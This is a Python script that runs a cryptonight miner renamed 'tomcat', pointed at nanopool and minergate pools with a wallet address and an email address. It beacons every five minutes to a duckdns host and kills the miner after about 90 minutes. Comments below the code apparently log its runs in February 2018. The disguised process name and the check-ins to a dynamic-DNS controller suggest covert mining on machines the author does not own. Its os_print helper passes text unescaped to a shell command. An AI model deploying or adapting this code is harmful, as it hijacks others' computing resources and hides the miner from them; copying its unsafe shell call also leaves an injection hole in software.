import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:07.873553
#2018-02-17 16:36:03.862343
#2018-02-17 18:24:03.620268
#2018-02-17 20:12:01.286892
#2018-02-17 21:58:06.943385
#2018-02-17 23:44:03.515696
#2018-02-18 01:34:01.734941
#2018-02-18 03:21:04.014479
#2018-02-18 05:08:06.727019
#2018-02-18 07:00:04.562346
#2018-02-18 08:48:06.734947
#2018-02-18 10:37:02.179303
#2018-02-18 12:22:01.818178
#2018-02-18 14:09:01.671849
#2018-02-18 15:59:01.330328
#2018-02-18 17:48:06.229952
#2018-02-18 19:36:07.200656
#2018-02-18 21:21:06.663070
#2018-02-18 23:09:04.997005
#2018-02-19 00:56:06.198807
#2018-02-19 02:43:06.371370
#2018-02-19 04:30:10.954326
#2018-02-19 06:15:06.491620
#2018-02-19 08:03:03.947565
#2018-02-19 09:52:06.947102
#2018-02-19 11:41:06.116096
#2018-02-19 13:27:04.191500
#2018-02-19 15:14:05.075134
#2018-02-19 17:03:08.910159
#2018-02-19 18:49:04.683741
#2018-02-19 20:39:02.184190
#2018-02-19 22:26:02.001878
#2018-02-20 00:12:07.081469
#2018-02-20 01:59:04.082787
#2018-02-20 03:49:04.025522
#2018-02-20 05:34:06.004104
#2018-02-20 07:18:07.421765
#2018-02-20 09:05:06.269684
#2018-02-20 10:48:01.755169
#2018-02-20 12:34:08.369261
#2018-02-20 14:20:02.001706
#2018-02-20 16:06:05.560206
#2018-02-20 17:51:11.000181
#2018-02-20 19:42:04.935548
#2018-02-20 21:28:04.659766
#2018-02-20 23:11:05.904679
#2018-02-21 00:54:06.785030
#2018-02-21 02:41:02.114512
#2018-02-21 04:28:05.728547
#2018-02-21 06:17:02.199905
#2018-02-21 08:03:05.842989
#2018-02-21 09:49:02.116806
#2018-02-21 11:37:04.816822
#2018-02-21 13:25:01.986527
#2018-02-21 15:10:06.116182
#2018-02-21 16:59:01.803371
#2018-02-21 18:47:09.779931
#2018-02-21 20:31:01.540415
#2018-02-21 22:16:07.239768
#2018-02-22 00:05:09.704719
#2018-02-22 01:53:05.646939
#2018-02-22 03:40:08.298450
#2018-02-22 05:27:01.790441
#2018-02-22 07:12:01.818456
#2018-02-22 08:59:07.564701
#2018-02-22 10:48:07.133865
#2018-02-22 12:34:03.797569
#2018-02-22 14:18:06.219077
#2018-02-22 16:07:07.117580
#2018-02-22 17:54:11.244938
#2018-02-22 19:42:04.989616
#2018-02-22 21:32:07.620680
#2018-02-22 23:19:01.839433
#2018-02-23 01:06:01.548392
#2018-02-23 02:53:04.469498
#2018-02-23 04:33:07.556104
#2018-02-23 06:20:09.490394
#2018-02-23 08:07:04.864373
#2018-02-23 10:24:04.597426
#2018-02-23 12:17:08.283634
#2018-02-23 14:05:03.620162
#2018-02-23 15:55:08.740305
#2018-02-23 17:40:07.477017
#2018-02-23 19:26:07.049845
#2018-02-23 21:10:06.613279
#2018-02-23 22:57:06.316533
#2018-02-24 00:44:08.190002
#2018-02-24 02:39:01.523877
#2018-02-24 04:33:06.952960
#2018-02-24 06:18:01.309915
#2018-02-24 08:06:06.720187
#2018-02-24 09:50:08.687319
#2018-02-24 11:45:06.725197
#2018-02-24 13:37:06.024937
#2018-02-24 15:25:06.176025
#2018-02-24 17:14:05.286667
#2018-02-24 19:06:03.559378
#2018-02-24 20:54:06.933898
#2018-02-24 23:19:05.659278
#2018-02-25 02:43:07.248529
#2018-02-25 06:25:07.116558